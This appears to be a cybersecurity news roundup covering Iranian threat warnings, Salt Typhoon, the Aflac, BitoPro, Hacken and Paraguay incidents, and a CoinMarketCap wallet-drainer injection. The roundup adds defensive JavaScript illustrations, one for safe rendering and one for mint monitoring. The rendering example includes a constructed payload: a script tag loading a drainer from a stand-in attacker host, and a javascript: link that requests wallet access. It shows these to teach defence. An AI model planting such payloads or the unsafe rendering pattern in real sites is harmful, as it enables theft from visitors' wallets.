DHS warns of likely Iranian cyberattacks following Trump's missile strikes

Authorities warn of Salt Typhoon threats in Canada, Aflac struck by likely Scattered Spider attack, DPRK likely behind BitoPro $11m theft, CoinMarketCap hit by wallet-draining attack, Hacker stole $250K from Hacken using leaked key, Garden Finance accused of laundering stolen crypto, much more

Photo by Akbar Nemati / Unsplash


The US Department of Homeland Security issued a bulletin warning that Iran-linked hackers and other groups affiliated with Tehran will likely launch cyberattacks against US targets in response to Donald Trump’s order to strike three of Iran’s nuclear sites.

“Low-level cyber attacks against US networks by pro-Iranian hacktivists are likely, and cyber actors affiliated with the Iranian government may conduct attacks against US networks,” said the alert from the National Terrorism Advisory System.

The notice, which expires Sept. 22, adds that “hacktivists and Iranian government-affiliated actors routinely target poorly secured US networks and internet-connected devices for disruptive cyber attacks.”

Under orders from Trump, US bombers struck the Fordow, Natanz, and Isfahan nuclear facilities in Iran on Saturday night, escalating years of tension between the two nations that had played out amid back-and-forth talks aimed at deterring Tehran from acquiring a nuclear weapon. Just over a week earlier, Israel launched its own strikes against Iranian military officials and nuclear scientists, saying Iran was closer than ever to a nuclear weapons capability.

Joint Chiefs Chair Gen. Dan Caine told reporters that the US Cyber Command was helping support the strikes, although he did not elaborate on its involvement. Last week, critical infrastructure groups called on US companies to proactively step up their defenses in anticipation of an attack. The heightened concern followed a pro-Israeli hacking group known as Predatory Sparrow claiming credit for a cyberattack on Iran’s Bank Sepah.

Other key developments related to Iran's possible cyberattacks on the US include:

  • Hackers also targeted Iranian news stations. These incidents coincided with Iran shutting down its internet, which the government later confirmed was to protect against Israeli cyberattacks.
  • A sophisticated Iranian cyber group has claimed responsibility for a major attack on the official website of Tirana Municipality, which disabled online services and disrupted the city’s public registration system for kindergartens and nurseries.
  • The non-profit Center for Internet Security (CIS) and several social media watchdogs confirmed that an Iranian-aligned hacktivist group called “313 Team” claimed responsibility for a distributed denial-of-service (DDoS) attack on Trump’s Truth Social platform just hours after the US strikes. Truth Social went down shortly after 8 p.m. ET on Saturday, moments after Trump announced the strikes on his account.
  • Former Justice Department and FBI officials warn that the US's ability to defend against potential Iranian terror and cyber attacks has been hampered by a “brain drain” in top Justice Department and FBI national security and counterterrorism units. (David DiMolfetta / NextGov/FCW, Maggie Miller / Politico, Lorenzo Franceschi-Bicchierai / TechCrunch, Tirana Times, Joe DePaolo / Mediaite, and David Rhode / NBC News)

Related: DHS.gov, LinkedIn, Times of India, Economic Times

The Canadian Centre for Cyber Security and the US Federal Bureau of Investigation urged Canadian organizations to harden their networks against the threat posed by Salt Typhoon, a group linked to the Chinese government.

“The Cyber Centre is aware of malicious cyber activities currently targeting Canadian telecommunications companies,” the center said. “The responsible actors are almost certainly PRC state-sponsored actors, specifically Salt Typhoon,” it said, referring to the People’s Republic of China.

Separate investigations that revealed overlaps with malicious indicators consistent with Salt Typhoon suggest the cyber campaign “is broader than just the telecommunications sector,” it said.

The agency said that hackers will “almost certainly” continue efforts to infiltrate Canadian organizations, especially telecom providers, over the next two years. (Layan Odeh / Bloomberg)

Related: Cyber.gc.ca, Cleveland.com

The cyber threat group Scattered Spider is likely responsible for a cyberattack reported by insurance giant Aflac, during which it potentially stole Social Security numbers, insurance claims, and health information.

“This attack, like many insurance companies are currently experiencing, was caused by a sophisticated cybercrime group,” Aflac said in a statement on Friday, without naming Scattered Spider. Aflac said it “stopped the intrusion within hours” after discovering it last week, that no ransomware was deployed, and that it continues to serve its customers.

The company said it was too early to tell how much customer information may have been stolen, but the potential exposure is vast.

According to Aflac, the hackers used “social engineering” to worm their way into its network. That tactic can involve duping someone into revealing security information to help gain access to a network. It’s a hallmark of Scattered Spider attackers, who are known to pose as tech support to infiltrate big corporations.

Scattered Spider was also likely responsible for attacks on Erie Insurance and Philadelphia Insurance Companies earlier this month, which caused widespread disruptions to IT systems used to serve customers. (Sean Lyngaas / CNN)

Related: SEC, Aflac, ABC News, USA Today, Associated Press, Reuters, The Record, Bleeping Computer, Columbus Ledger-Enquirer, WCVB, The Register, DataBreaches.Net, PCMag, Bloomberg, CNN, eSecurity Planet, BankInfoSecurity.com, CNET, Wall Street Journal, The Cyber Express, SC Media, New York Post, Quartz, Fast Company, Axios, The Hill, CyberScoop, Insurance Journal, UPI, Baller Alert, WPXI-TV, Yahoo Finance, Washington Examiner

The Taiwanese cryptocurrency exchange BitoPro claims the North Korean hacking group Lazarus is behind a cyberattack that led to the theft of $11,000,000 worth of cryptocurrency on May 8, 2025.

The company has attributed the attack to Lazarus based on the evidence recovered from its internal investigations. It notes that the attack patterns and methodology closely resemble those used in past cyberattacks.

"The attack methodology bears resemblance to patterns observed in multiple past international major incidents, including illicit transfers from global bank SWIFT systems and asset theft incidents from major international cryptocurrency exchanges," BitoPro said.

"These attacks are attributed to the North Korean hacking organization Lazarus Group." (Bill Toulas / Bleeping Computer)

Related: BitoPro, BraveNewCoin

On Friday, CoinMarketCap visitors began seeing Web3 popups asking them to connect their wallets to the site. However, when visitors connected their wallets, a malicious script drained cryptocurrency from them.

The company later confirmed that threat actors used a vulnerability in the site's homepage "doodle" image to inject malicious JavaScript into the site.

"On June 20, 2025, our security team identified a vulnerability related to a doodle image displayed on our homepage. This doodle image contained a link that triggered malicious code through an API call, resulting in an unexpected popup for some users when visited our homepage," reads a statement posted on X.

"Upon discovery, We acted immediately to remove the problematic content, identified the root cause, and comprehensive measures have been implemented to isolate and mitigate the issue." (Lawrence Abrams / Bleeping Computer)
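The pattern CoinMarketCap describes, a "doodle" record fetched from an API whose contents end up in the page as live markup, is worth seeing beside its hardened form. The following is an added example, not CoinMarketCap's code: the field names (imageUrl, caption, link), both render functions, and the tampered record are hypothetical and constructed for illustration. Rendering is to an HTML string so it runs offline under Node; in a browser the unsafe version is exactly what an innerHTML assignment does.

```javascript
// Added example, not CoinMarketCap's code. Field names, render functions and
// the payload are hypothetical/constructed. Shows the unsafe pattern (API data
// concatenated into markup) next to a hardened renderer.

// Constructed tampered record: markup smuggled in the caption, a javascript:
// URL in the link. This is the kind of content that yields an unexpected
// "connect your wallet" popup.
const TAMPERED_DOODLE = {
  imageUrl: "https://cdn.example.test/doodle.png",
  caption: 'Connect your wallet<script src="https://evil.example.test/drainer.js"></script>',
  link: "javascript:window.ethereum.request({method:'eth_requestAccounts'})",
};

// Constructed benign record for comparison.
const BENIGN_DOODLE = {
  imageUrl: "https://cdn.example.test/doodle.png",
  caption: "Happy Friday & welcome",
  link: "https://example.test/blog/doodle",
};

// Vulnerable: API data is trusted and concatenated straight into markup.
// The <script> in the caption becomes live HTML and the javascript: href
// runs when clicked.
function renderDoodleUnsafe(d) {
  return `<a href="${d.link}"><img src="${d.imageUrl}" alt=""><span>${d.caption}</span></a>`;
}

// Hardened helpers: escape every field for the HTML context it lands in, and
// accept only http(s) URLs for href and src.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function safeHttpUrl(raw) {
  let u;
  try {
    u = new URL(String(raw));
  } catch {
    return null; // unparseable, relative, or empty
  }
  return u.protocol === "https:" || u.protocol === "http:" ? u.href : null;
}

// Hardened: a rejected image means no doodle at all; a rejected link means the
// image renders without an anchor rather than with a dangerous one.
function renderDoodleSafe(d) {
  const src = safeHttpUrl(d.imageUrl);
  if (!src) return "";
  const body = `<img src="${escapeHtml(src)}" alt=""><span>${escapeHtml(d.caption)}</span>`;
  const href = safeHttpUrl(d.link);
  return href ? `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${body}</a>` : body;
}

console.log(renderDoodleUnsafe(TAMPERED_DOODLE));
console.log(renderDoodleSafe(TAMPERED_DOODLE));
console.log(renderDoodleSafe(BENIGN_DOODLE));
```

Two practitioner caveats follow from this. First, content records such as doodles and banners are attacker-controlled data the moment the system that stores or serves them is compromised, so they deserve the same escaping and URL validation as user input. Second, a Content-Security-Policy with a strict script-src allowlist is the layer that would stop a remote drainer script from loading even when the markup escape is missed; the two controls are complementary, not alternatives.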

Related: Cointelegraph, CoinDesk, CoinGape, BeInCrypto, Cryptopolitan, Crypto Briefing, r/Bitcoin, The Crypto Times, HackRead

Cybersecurity firm Hacken blamed a leaked private key for an incident in which a bad actor minted and dumped about $250,000 worth of the ecosystem’s native Hacken Token (HAI), sending its price down roughly 99% on Saturday.

In an X post, Hacken said the private key was connected to an account with a minting role on the Ethereum and BNB Chain, which led to “unauthorized HAI minting and a dump” on decentralized exchanges. This caused a 99% drop in the value of HAI from $0.015 to $0.000056.

Hacken team members said they’ve since revoked the compromised minter account from the token contract and regained control; however, based on Hacken’s current estimates, the bad actor still managed to flee with at least $250,000 worth of tokens. (Stephen Katte / Cointelegraph)
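The failure mode here, a minter key that leaks and is used for an unauthorized mint followed by a dump, is detectable on-chain before the dump completes. The following is an added example, not Hacken's code: a detection pass over ERC-20 style Transfer events, where a mint is a Transfer whose `from` is the zero address. The addresses, policy numbers and event records are constructed for the example; a real deployment would feed this from a node's log subscription.

```javascript
// Added example, not Hacken's code. Addresses, policy values and events are
// constructed. Flags mints from non-allowlisted signers and mints that breach
// a volume cap within a rolling window.

const ZERO = "0x" + "0".repeat(40);
const MINTER = "0x" + "a".repeat(40);         // the legitimate minter account
const TREASURY = "0x" + "b".repeat(40);
const USER = "0x" + "c".repeat(40);
const ATTACKER_SINK = "0x" + "d".repeat(40);
const UNKNOWN_MINTER = "0x" + "e".repeat(40);

const DECIMALS = 10n ** 18n;

// Hypothetical policy: who may mint, and how much may be minted in a rolling
// window regardless of who signs.
const POLICY = {
  allowedMinters: new Set([MINTER]),
  maxMintPerWindow: 1_000_000n * DECIMALS,
  windowSeconds: 3600,
};

// Constructed events. `txFrom` is the account that signed the transaction.
const EVENTS = [
  { from: ZERO, to: TREASURY, value: 500_000n * DECIMALS, ts: 1000, txFrom: MINTER },            // scheduled mint
  { from: TREASURY, to: USER, value: 10n * DECIMALS, ts: 1100, txFrom: TREASURY },              // ordinary transfer
  { from: ZERO, to: ATTACKER_SINK, value: 50_000_000n * DECIMALS, ts: 1200, txFrom: MINTER },   // leaked key: signed by the real minter
  { from: ZERO, to: ATTACKER_SINK, value: 1n * DECIMALS, ts: 1300, txFrom: UNKNOWN_MINTER },    // role handed to an unknown address
];

// Returns one alert object per violation. An allowlist alone misses the leaked
// key case, because the signer is the legitimate minter; the volume cap is what
// catches it.
function auditMints(events, policy) {
  const alerts = [];
  const mints = events.filter((e) => e.from === ZERO).sort((a, b) => a.ts - b.ts);
  let window = [];
  for (const m of mints) {
    if (!policy.allowedMinters.has(m.txFrom)) {
      alerts.push({ kind: "unknown_minter", ts: m.ts, txFrom: m.txFrom, value: m.value });
    }
    window = window.filter((w) => m.ts - w.ts < policy.windowSeconds);
    window.push(m);
    const minted = window.reduce((sum, w) => sum + w.value, 0n);
    if (minted > policy.maxMintPerWindow) {
      alerts.push({ kind: "cap_exceeded", ts: m.ts, txFrom: m.txFrom, value: minted });
    }
  }
  return alerts;
}

// Supply created per signer, useful for scoping the damage after the fact.
function mintedBySigner(events) {
  const totals = new Map();
  for (const e of events) {
    if (e.from !== ZERO) continue;
    totals.set(e.txFrom, (totals.get(e.txFrom) ?? 0n) + e.value);
  }
  return totals;
}

for (const a of auditMints(EVENTS, POLICY)) {
  console.log(a.kind, "at", a.ts, "signer", a.txFrom.slice(0, 10), "tokens", (a.value / DECIMALS).toString());
}
```

Off-chain monitoring like this buys minutes, not safety; the durable controls sit in the contract and the key custody. A hard supply cap or per-period mint limit enforced inside mint() bounds what any single leaked key can do, and keeping the minter role on a multisig or hardware-backed signer behind a timelock means a leaked hot key cannot mint at all. The response Hacken describes, revoking the compromised minter from the token contract, is the role-revocation step of an access-control style contract and should be rehearsed so it can be executed in minutes.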

Related: crypto.news, FX Leaders, The Block, The Crypto Times, dev.ua

Blockchain sleuth ZachXBT has accused Garden Finance, which brands itself as “the fastest Bitcoin bridge,” of facilitating the laundering of funds linked to major crypto thefts, including the Bybit hack.

In a post on X, ZachXBT claimed that over 80% of Garden’s recent fee revenue stemmed from illicit transactions allegedly tied to the North Korean Lazarus Group.

The allegation came in response to an earlier post by Jaz Gulati, a co-founder of Garden Finance, who had recently touted the platform’s success, citing 38.86 Bitcoin in collected fees, $300,000 of which was earned over the 12 days ending June 2.

“You conveniently left out >80% of your fees came from Chinese launderers moving Lazarus Group funds from the Bybit hack,” ZachXBT said.

ZachXBT further alleged that a single actor continuously topped up cbBTC liquidity from Coinbase, effectively fueling illicit flows while Garden claimed to operate a trustless and decentralized model.

“Explain how it is ‘decentralized’ when I watched in real time for multiple days as a single entity kept topping up cbBTC liquidity from Coinbase,” ZachXBT wrote, questioning the project’s claims of decentralization.

In response, Garden Finance co-founder Jaz Gulati denied the allegations, pointing out that 30 BTC in fees were collected before the Bybit incident. He dismissed the criticism as misinformation, calling the “fake decentralized” label baseless. (Amin Haqshanas / Cointelegraph)

Related: The Crypto Times

Russian dairy producers reported supply disruptions following a cyberattack on the country’s digital system for certifying animal-based products.

The Mercury platform, part of Russia’s Federal State Information System for Veterinary Surveillance (VetIS), was taken offline due to the attack. According to local media reports, this is the third such incident this year and the most severe to date.

The outage forced producers and suppliers to revert to paper-based veterinary certificates. This shift caused logistical chaos: Several regional distribution centers refused to accept goods, reports said, and major retailers such as Lenta, Yandex Lavka, and Miratorg experienced supply chain interruptions.

Under Russian law, all businesses handling meat, dairy, eggs, and other animal products must register with Mercury and issue veterinary documents electronically. Without them, processors are legally barred from accepting raw milk, as digital certification is required to verify product authenticity and safety.

While farmers can temporarily use paper certificates, many retailers rely exclusively on electronic document management systems and cannot accept paper-based deliveries, so local media reported that deliveries were refused at some points in the supply chain.

According to the dairy industry association Soyuzmoloko, some retailers are refusing to accept products without electronic documents. The group also warned that unclear guidance from regulators has confused suppliers.

The outage has also disrupted data exchange with other government digital platforms, including Russia’s mandatory product labeling system. Large-volume producers have been hit particularly hard, with industry representatives saying the emergency procedures are not designed for prolonged disruptions. (Daryna Antoniuk / The Record)

Related: DairyNews.ru, GBHackers, Milknews.ru

Sources say the White House recently nixed Army Lt. Gen. Richard Angle to be director of the National Security Agency and head of US Cyber Command.

They claim Angle, a career special operations soldier, had the support of Defense Secretary Pete Hegseth and Director of National Intelligence Tulsi Gabbard.

Angle’s name being withdrawn from consideration comes after reporting that both Hegseth and Gabbard have dwindling influence over the White House’s Iran policy. (John Sakellariadis / Politico)

Related: r/politics

US District Judge Ada Brown in Dallas granted preliminary approval to a $177-million settlement that resolves lawsuits against AT&T over breaches in 2024 that exposed personal information belonging to tens of millions of the telecom company’s customers.

The deal resolves claims over data breaches AT&T announced in May and July last year. Depending on which breach is involved, AT&T has agreed to pay up to $2,500 or $5,000 to customers who suffered "fairly traceable" losses from the incidents.

After payments are made for direct losses, the remaining funds will be distributed to customers whose personal information was accessed. (Mike Scarcella and David Shepardson / Reuters)

Related: PhoneArena, Guru Focus

Federal Communications Commission chair Brendan Carr said he had ordered a review of the US Cyber Trust Mark program over "potentially concerning ties to the government of China."

The Cyber Trust Mark program was adopted during the Biden administration as a voluntary device testing program designed to be a safety label for IoT smart products, including home security cameras, TVs, internet-connected appliances, fitness trackers, and baby monitors sold in the US.

Carr said the FCC's Council on National Security would carry out the review. (Rami Ayyub / Reuters)

Related: PCMag, Reuters, Bloomberg Law

Researchers at Cybereason say the Qilin ransomware group appears to be gaining ground even as the first half of 2025 witnessed the decline and demise of several once-dominant ransomware groups, such as LockBit, RansomHub, Everest, and BlackLock, partly due to the impact of previous law enforcement operations, data leaks, and breaches.

The researchers say that what makes Qilin stand out is its activity and the set of advanced features it offers its affiliates.

These offerings range from operational features to more innovative services, such as a “Call Lawyer” function, which provides legal consultation to increase pressure during ransom negotiations.

Moreover, Qilin operates a technically mature infrastructure, with custom-built malware written in Rust and C for cross-platform attacks, including Windows, Linux, and ESXi systems.

The group operates by providing ransomware tools and infrastructure to affiliates, taking a 15–20% share of ransom payments. It explicitly instructs its affiliates not to target systems located in Commonwealth of Independent States (CIS) countries, including Russia and Belarus. (Kevin Poireault / Infosecurity Magazine)

Related: Cybereason, Security Affairs, The Register, Fortra

Heat map indicating that Qilin is intensifying its activities. Source: Cybereason.

Paraguay said it would not pay a ransomware group called Brigada Cyber PMC, which obtained personal data that potentially covers every citizen.

“The government never negotiates with these types of actors,” said Gustavo Villate, Minister of Technology and Information.

The group posted a ransom message to Paraguayans on the so-called “darknet,” an online space where criminals flog drugs, weapons, and other illicit items and services.

“We have record on EVERY citizen, every person residing in Paraguay,” the group said.

Brigada Cyber PMC added that it would “give a good chance to these bureaucrats [sic] to fix the problem” by paying a ransom of about $1 per citizen by this Friday. The message included a timer counting down the days, hours, minutes, and seconds to the deadline.

Paraguay’s government did not make the breach public. It was first reported in a blog post by Resecurity, a Los Angeles-based cybersecurity company that is investigating the incident and sharing its findings with Paraguay.

Resecurity said that the attack “could be interpreted as a landmark in known cybersecurity incidents today, by size and scale, as the entire country was extorted due to a massive data breach.” (Aldo Benitez / OCCRP)

Related: Resecurity, GovInfoSecurity

Brigada Cyber PMC's leak page post on Paraguay. Source: Resecurity.

Microsoft shut off the email account of Karim Khan, the prosecutor of the International Criminal Court, after Donald Trump issued an executive order against him for investigating Israel for war crimes, stoking European fears that America would leverage its tech dominance to penalize opponents even in allied countries.

Sources say that some at the ICC are now using Proton, a Swiss company that provides encrypted email services.

An ICC spokesman said it was taking steps to “mitigate risks which may affect the court’s personnel” and “taking extensive measures to ensure the continuity of all relevant operations and services in the face of sanctions.”

The episode has set off alarms across Europe about how dependent European governments, businesses, and citizens are on American tech companies like Microsoft for essential digital infrastructure, and how hard it will be to disentangle themselves. (Adam Satariano and Jeanna Smialek / New York Times)

Related: Reuters, Cryptopolitan, Hacker News (ycombinator)

Sources say Reddit is considering using World ID, the verification system based on iris-scanning Orbs, whose parent company was co-founded by OpenAI CEO Sam Altman.

They say World ID could soon become a way for Reddit users to verify that they are unique individuals while remaining anonymous on the platform.

Talks between representatives of Reddit and World ID parent Tools for Humanity highlight the growing market for new identity verification technologies.

As artificial intelligence floods online platforms with inauthentic content, governments worldwide are considering new age verification laws to prevent children and teenagers from accessing social media. (Reed Albergotti / Semafor)

Related: The Block, San Francisco Business Times, Cointelegraph, Protos, Crypto Briefing, crypto.news, r/unusual_whales, r/CryptoCurrency, r/singularity, r/privacy, r/RedditAlternatives, r/technology

In an SEC filing, American steel giant Nucor Corporation confirmed that hackers stole some data from its systems during a cyberattack that it reported in May.

Nucor said its investigation showed that the threat actor managed to exfiltrate “limited data” from the compromised IT systems.

“The Company is reviewing and evaluating the impacted data and will carry out any appropriate notifications to potentially affected parties and to regulatory agencies as required by applicable law,” Nucor said. (Eduard Kovacs / Security Week)

Related: SEC, Bleeping Computer, Security Affairs

Best Thing of the Day: Experts Explain Iranian Cyber Attack Threats

Over the weekend, two cyber experts stepped up with predictions of whether "cyberwar" might break out between Iran and the US. Check out the videos below by Marcus Hutchins and Mark Montgomery.

Worst Thing of the Day: Some Things Should Not Be Encrypted

A coordinated effort led by Denmark’s National Special Crime Unit (National Enhed for Særlig Kriminalitet), with the support of the Swedish Police (Polisen) and Europol under the Operational Taskforce (OTF) GRIMM, resulted in the arrests of several individuals suspected of recruiting others, including minors, to carry out contract killings in Denmark using encrypted platforms.

Closing Thought
